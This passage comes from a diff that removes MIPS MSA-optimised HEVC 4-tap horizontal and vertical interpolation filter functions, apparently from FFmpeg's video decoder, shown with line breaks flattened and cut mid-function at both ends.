vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src6, src7, src6, src7, mask00, mask11, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_SH2(dst0, dst1, dst, 8); - dst += dst_stride; - ST_SH2(dst2, dst3, dst, 8); - dst += dst_stride; - - /* 8 width */ - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src7, src7, src7, src7, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_SH4(dst0, dst1, dst2, dst3, dst_tmp, dst_stride); - dst_tmp += (4 * dst_stride); - } -} - -static void hevc_hz_4t_32w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2; - v8i16 filt0, filt1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1, mask2, mask3; - v8i16 dst0, dst1, dst2, dst3; - v16i8 vec0, vec1, vec2, vec3; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - mask1 = mask0 + 2; - mask2 = mask0 + 8; - mask3 = mask0 + 10; - - for (loop_cnt = height; loop_cnt--;) { - LD_SB2(src, 16, src0, src1); - src2 = LD_SB(src + 24); - src += src_stride; - - XORI_B3_128_SB(src0, src1, src2); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - VSHF_B2_SB(src0, src0, src0, src1, mask0, mask2, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask0, mask0, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src0, src1, mask1, mask3, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask1, mask1, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - ST_SH4(dst0, dst1, dst2, dst3, dst, 8); - dst += dst_stride; - } -} - -static void hevc_vt_4t_4x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v16i8 src0, src1, src2, src3, src4; - v16i8 src10_r, src32_r, src21_r, src43_r; - v16i8 src2110, src4332; - v8i16 dst10; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB5(src, src_stride, src0, src1, src2, src3, src4); - ILVR_B4_SB(src1, src0, src2, src1, src3, src2, src4, src3, - src10_r, src21_r, src32_r, src43_r); - - ILVR_D2_SB(src21_r, src10_r, src43_r, src32_r, src2110, src4332); - XORI_B2_128_SB(src2110, src4332); - dst10 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - - ST_D2(dst10, 0, 1, dst, dst_stride); -} - -static void hevc_vt_4t_4x4_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6; - v16i8 src10_r, src32_r, src54_r, src21_r, src43_r, src65_r; - v16i8 src2110, src4332, src6554; - v8i16 dst10, dst32; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - ILVR_B4_SB(src1, src0, src2, src1, src3, src2, src4, src3, - src10_r, src21_r, src32_r, src43_r); - ILVR_B2_SB(src5, src4, src6, src5, src54_r, src65_r); - ILVR_D3_SB(src21_r, src10_r, src43_r, src32_r, src65_r, src54_r, - src2110, src4332, src6554); - XORI_B3_128_SB(src2110, src4332, src6554); - dst10 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - dst32 = const_vec; - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst32, dst32); - - ST_D4(dst10, dst32, 0, 1, 0, 1, dst, dst_stride); -} - -static void hevc_vt_4t_4x8_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, src109_r; - v16i8 src2110, src4332, src6554, src8776, src10998; - v8i16 dst10, dst32, dst54, dst76; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - src2110 = (v16i8) __msa_ilvr_d((v2i64) src21_r, (v2i64) src10_r); - src2110 = (v16i8) __msa_xori_b((v16u8) src2110, 128); - - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, src10); - src += (8 * src_stride); - ILVR_B4_SB(src3, src2, src4, src3, src5, src4, src6, src5, - src32_r, src43_r, src54_r, src65_r); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - ILVR_D4_SB(src43_r, src32_r, src65_r, src54_r, src87_r, src76_r, src109_r, - src98_r, src4332, src6554, src8776, src10998); - XORI_B4_128_SB(src4332, src6554, src8776, src10998); - dst10 = const_vec; - dst32 = const_vec; - dst54 = const_vec; - dst76 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst32, dst32); - DPADD_SB2_SH(src6554, src8776, filt0, filt1, dst54, dst54); - DPADD_SB2_SH(src8776, src10998, filt0, filt1, dst76, dst76); - ST_D8(dst10, dst32, dst54, dst76, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); -} - -static void hevc_vt_4t_4x16_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r, src21_r, src43_r; - v16i8 src65_r, src87_r, src109_r, src2110, src4332, src6554, src8776; - v16i8 src10998; - v8i16 dst10, dst32, dst54, dst76, filt0, filt1, filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - src2110 = (v16i8) __msa_ilvr_d((v2i64) src21_r, (v2i64) src10_r); - src2110 = (v16i8) __msa_xori_b((v16u8) src2110, 128); - - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, src10); - src += (8 * src_stride); - ILVR_B4_SB(src3, src2, src4, src3, src5, src4, src6, src5, src32_r, src43_r, - src54_r, src65_r); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, src76_r, - src87_r, src98_r, src109_r); - ILVR_D4_SB(src43_r, src32_r, src65_r, src54_r, src87_r, src76_r, src109_r, - src98_r, src4332, src6554, src8776, src10998); - XORI_B4_128_SB(src4332, src6554, src8776, src10998); - - dst10 = const_vec; - dst32 = const_vec; - dst54 = const_vec; - dst76 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst32, dst32); - DPADD_SB2_SH(src6554, src8776, filt0, filt1, dst54, dst54); - DPADD_SB2_SH(src8776, src10998, filt0, filt1, dst76, dst76); - ST_D8(dst10, dst32, dst54, dst76, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - - src2 = src10; - src2110 = src10998; - - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, src10); - src += (8 * src_stride); - - ILVR_B4_SB(src3, src2, src4, src3, src5, src4, src6, src5, src32_r, src43_r, - src54_r, src65_r); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, src76_r, - src87_r, src98_r, src109_r); - ILVR_D4_SB(src43_r, src32_r, src65_r, src54_r, src87_r, src76_r, src109_r, - src98_r, src4332, src6554, src8776, src10998); - XORI_B4_128_SB(src4332, src6554, src8776, src10998); - - dst10 = const_vec; - dst32 = const_vec; - dst54 = const_vec; - dst76 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst32, dst32); - DPADD_SB2_SH(src6554, src8776, filt0, filt1, dst54, dst54); - DPADD_SB2_SH(src8776, src10998, filt0, filt1, dst76, dst76); - ST_D8(dst10, dst32, dst54, dst76, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); -} - -static void hevc_vt_4t_4w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - if (2 == height) { - hevc_vt_4t_4x2_msa(src, src_stride, dst, dst_stride, filter); - } else if (4 == height) { - hevc_vt_4t_4x4_msa(src, src_stride, dst, dst_stride, filter, height); - } else if (8 == height) { - hevc_vt_4t_4x8_msa(src, src_stride, dst, dst_stride, filter, height); - } else if (16 == height) { - hevc_vt_4t_4x16_msa(src, src_stride, dst, dst_stride, filter, height); - } -} - -static void hevc_vt_4t_6w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - int32_t res = height & 0x03; - uint32_t dst_val_int0, dst_val_int1, dst_val_int2, dst_val_int3; - uint64_t dst_val0, dst_val1, dst_val2, dst_val3; - v16i8 src0, src1, src2, src3, src4; - v16i8 src10_r, src32_r, src21_r, src43_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - src += (2 * src_stride); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - LD_SB2(src, src_stride, src1, src2); - src += (2 * src_stride); - XORI_B2_128_SB(src1, src2); - ILVR_B2_SB(src1, src4, src2, src1, src10_r, src21_r); - - dst2_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst3_r, dst3_r); - - dst_val0 = __msa_copy_u_d((v2i64) dst0_r, 0); - dst_val1 = __msa_copy_u_d((v2i64) dst1_r, 0); - dst_val2 = __msa_copy_u_d((v2i64) dst2_r, 0); - dst_val3 = __msa_copy_u_d((v2i64) dst3_r, 0); - - dst_val_int0 = __msa_copy_u_w((v4i32) dst0_r, 2); - dst_val_int1 = __msa_copy_u_w((v4i32) dst1_r, 2); - dst_val_int2 = __msa_copy_u_w((v4i32) dst2_r, 2); - dst_val_int3 = __msa_copy_u_w((v4i32) dst3_r, 2); - - SD(dst_val0, dst); - SW(dst_val_int0, dst + 4); - dst += dst_stride; - SD(dst_val1, dst); - SW(dst_val_int1, dst + 4); - dst += dst_stride; - SD(dst_val2, dst); - SW(dst_val_int2, dst + 4); - dst += dst_stride; - SD(dst_val3, dst); - SW(dst_val_int3, dst + 4); - dst += dst_stride; - } - if (res) { - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - dst_val0 = __msa_copy_u_d((v2i64) dst0_r, 0); - dst_val1 = __msa_copy_u_d((v2i64) dst1_r, 0); - - dst_val_int0 = __msa_copy_u_w((v4i32) dst0_r, 2); - dst_val_int1 = __msa_copy_u_w((v4i32) dst1_r, 2); - - SD(dst_val0, dst); - SW(dst_val_int0, dst + 4); - dst += dst_stride; - SD(dst_val1, dst); - SW(dst_val_int1, dst + 4); - dst += dst_stride; - } -} - -static void hevc_vt_4t_8x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v16i8 src0, src1, src2, src3, src4; - v16i8 src10_r, src32_r, src21_r, src43_r; - v8i16 dst0_r, dst1_r; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - ST_SH2(dst0_r, dst1_r, dst, dst_stride); -} - -static void hevc_vt_4t_8x6_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v16i8 src0, src1, src2, src3, src4; - v16i8 src10_r, src32_r, src21_r, src43_r; - v8i16 dst0_r, dst1_r; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - - LD_SB2(src, src_stride, src3, src4); - src += (2 * src_stride); - XORI_B2_128_SB(src3, src4); - - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - ST_SH2(dst0_r, dst1_r, dst, dst_stride); - dst += (2 * dst_stride); - - LD_SB2(src, src_stride, src1, src2); - src += (2 * src_stride); - XORI_B2_128_SB(src1, src2); - - ILVR_B2_SB(src1, src4, src2, src1, src10_r, src21_r); - dst0_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst1_r, dst1_r); - - ST_SH2(dst0_r, dst1_r, dst, dst_stride); - dst += (2 * dst_stride); - - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - ST_SH2(dst0_r, dst1_r, dst, dst_stride); -} - -static void hevc_vt_4t_8x4multiple_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6; - v16i8 src10_r, src32_r, src21_r, src43_r, src54_r, src65_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src3, src4, src5, src6); - src += (4 * src_stride); - XORI_B4_128_SB(src3, src4, src5, src6); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVR_B2_SB(src5, src4, src6, src5, src54_r, src65_r); - dst0_r = const_vec; - dst1_r = const_vec; - dst2_r = const_vec; - dst3_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - DPADD_SB2_SH(src32_r, src54_r, filt0, filt1, dst2_r, dst2_r); - DPADD_SB2_SH(src43_r, src65_r, filt0, filt1, dst3_r, dst3_r); - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - dst += (4 * dst_stride); - - src2 = src6; - src10_r = src54_r; - src21_r = src65_r; - } -} - -static void hevc_vt_4t_8w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - if (2 == height) { - hevc_vt_4t_8x2_msa(src, src_stride, dst, dst_stride, filter); - } else if (6 == height) { - hevc_vt_4t_8x6_msa(src, src_stride, dst, dst_stride, filter); - } else { - hevc_vt_4t_8x4multiple_msa(src, src_stride, dst, dst_stride, - filter, height); - } -} - -static void hevc_vt_4t_12w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6; - v16i8 src10_r, src32_r, src21_r, src43_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src54_l, src21_l, src43_l, src65_l; - v16i8 src2110, src4332; - v16i8 src54_r, src65_r, src6554; - v8i16 dst0_l, dst1_l; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= (1 * src_stride); - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - ILVL_B2_SB(src1, src0, src2, src1, src10_l, src21_l); - src2110 = (v16i8) __msa_ilvr_d((v2i64) src21_l, (v2i64) src10_l); - - for (loop_cnt = 4; loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - src += (2 * src_stride); - LD_SB2(src, src_stride, src5, src6); - src += (2 * src_stride); - XORI_B2_128_SB(src3, src4); - XORI_B2_128_SB(src5, src6); - - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVL_B2_SB(src3, src2, src4, src3, src32_l, src43_l); - src4332 = (v16i8) __msa_ilvr_d((v2i64) src43_l, (v2i64) src32_l); - ILVR_B2_SB(src5, src4, src6, src5, src54_r, src65_r); - ILVL_B2_SB(src5, src4, src6, src5, src54_l, src65_l); - src6554 = (v16i8) __msa_ilvr_d((v2i64) src65_l, (v2i64) src54_l); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - dst2_r = const_vec; - DPADD_SB2_SH(src32_r, src54_r, filt0, filt1, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB2_SH(src43_r, src65_r, filt0, filt1, dst3_r, dst3_r); - dst0_l = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst0_l, dst0_l); - dst1_l = const_vec; - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst1_l, dst1_l); - - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - ST_D4(dst0_l, dst1_l, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - - src2 = src6; - src10_r = src54_r; - src21_r = src65_r; - src2110 = src6554; - } -} - -static void hevc_vt_4t_16w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5; - v16i8 src10_r, src32_r, src21_r, src43_r; - v16i8 src10_l, src32_l, src21_l, src43_l; - v8i16 dst0_r, dst1_r, dst0_l, dst1_l; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - ILVL_B2_SB(src1, src0, src2, src1, src10_l, src21_l); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - src += (2 * src_stride); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVL_B2_SB(src3, src2, src4, src3, src32_l, src43_l); - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src10_l, src32_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src21_l, src43_l, filt0, filt1, dst1_l, dst1_l); - ST_SH2(dst0_r, dst0_l, dst, 8); - dst += dst_stride; - ST_SH2(dst1_r, dst1_l, dst, 8); - dst += dst_stride; - - LD_SB2(src, src_stride, src5, src2); - src += (2 * src_stride); - XORI_B2_128_SB(src5, src2); - ILVR_B2_SB(src5, src4, src2, src5, src10_r, src21_r); - ILVL_B2_SB(src5, src4, src2, src5, src10_l, src21_l); - dst0_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src32_l, src10_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src43_l, src21_l, filt0, filt1, dst1_l, dst1_l); - ST_SH2(dst0_r, dst0_l, dst, 8); - dst += dst_stride; - ST_SH2(dst1_r, dst1_l, dst, 8); - dst += dst_stride; - } -} - -static void hevc_vt_4t_24w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5; - v16i8 src6, src7, src8, src9, src10, src11; - v16i8 src10_r, src32_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src21_l, src43_l; - v8i16 dst0_l, dst1_l; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - ILVL_B2_SB(src1, src0, src2, src1, src10_l, src21_l); - - LD_SB3(src + 16, src_stride, src6, src7, src8); - src += (3 * src_stride); - XORI_B3_128_SB(src6, src7, src8); - ILVR_B2_SB(src7, src6, src8, src7, src76_r, src87_r); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVL_B2_SB(src3, src2, src4, src3, src32_l, src43_l); - - LD_SB2(src + 16, src_stride, src9, src10); - src += (2 * src_stride); - XORI_B2_128_SB(src9, src10); - ILVR_B2_SB(src9, src8, src10, src9, src98_r, src109_r); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src10_l, src32_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src21_l, src43_l, filt0, filt1, dst1_l, dst1_l); - dst2_r = const_vec; - DPADD_SB2_SH(src76_r, src98_r, filt0, filt1, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB2_SH(src87_r, src109_r, filt0, filt1, dst3_r, dst3_r); - - ST_SH2(dst0_r, dst0_l, dst, 8); - ST_SH(dst2_r, dst + 16); - dst += dst_stride; - ST_SH2(dst1_r, dst1_l, dst, 8); - ST_SH(dst3_r, dst + 16); - dst += dst_stride; - - LD_SB2(src, src_stride, src5, src2); - XORI_B2_128_SB(src5, src2); - ILVR_B2_SB(src5, src4, src2, src5, src10_r, src21_r); - ILVL_B2_SB(src5, src4, src2, src5, src10_l, src21_l); - - LD_SB2(src + 16, src_stride, src11, src8); - src += (2 * src_stride); - XORI_B2_128_SB(src11, src8); - ILVR_B2_SB(src11, src10, src8, src11, src76_r, src87_r); - - dst0_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src32_l, src10_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src43_l, src21_l, filt0, filt1, dst1_l, dst1_l); - dst2_r = const_vec; - DPADD_SB2_SH(src98_r, src76_r, filt0, filt1, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB2_SH(src109_r, src87_r, filt0, filt1, dst3_r, dst3_r); - - ST_SH2(dst0_r, dst0_l, dst, 8); - ST_SH(dst2_r, dst + 16); - dst += dst_stride; - ST_SH2(dst1_r, dst1_l, dst, 8); - ST_SH(dst3_r, dst + 16); - dst += dst_stride; - } -} - -static void hevc_vt_4t_32w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5; - v16i8 src6, src7, src8, src9, src10, src11; - v16i8 src10_r, src32_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src76_l, src98_l; - v16i8 src21_l, src43_l, src87_l, src109_l; - v8i16 dst0_l, dst1_l, dst2_l, dst3_l; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - ILVL_B2_SB(src1, src0, src2, src1, 